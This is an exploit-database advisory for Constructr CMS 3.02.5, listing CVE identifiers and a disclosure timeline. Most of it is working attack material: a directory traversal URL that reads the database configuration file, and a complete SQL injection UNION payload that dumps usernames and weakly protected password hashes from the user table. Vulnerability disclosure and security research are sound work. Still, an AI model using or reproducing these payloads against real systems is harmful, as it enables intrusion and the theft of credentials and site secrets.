Constructr CMS 3.02.5 stable - Multiple Vulnerabilities

Author: fuzion
type: webapps
platform: php
port: 
date_added: 2008-12-18 
date_updated:  
verified: 1 
codes: OSVDB-51153;CVE-2008-5860;OSVDB-50889;CVE-2008-5859;OSVDB-50888;CVE-2008-5847 
tags: 
aliases:  
screenshot_url:  
application_url: 

Constructr CMS
http://constructr-cms.org/

- <= 3.02.5 "Stable" -

magic_quotes_gpc = Off
register_globals = On

- Directory Traversal - Source Disclosure - Arbitrary File Creation - Etc Etc Etc -
http://site/constructr/backend/template.php?edit_file=

Db info:
../config/config.inc.php


- SQL -
http://site/constructr/?show_page=

User (urlencode) :
-0' UNION ALL SELECT NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0),IFNULL(CAST(hash AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL, NULL, NULL, NULL FROM constructr_user# AND 'tBkML'='tBkML
"Hash" is the password, not really encrypted...


- Timeline -
Author notified: Dec 12
Public Disclosure: Dec 19


- Seasons Greetings -
- http://nukeit.org -

# milw0rm.com [2008-12-19]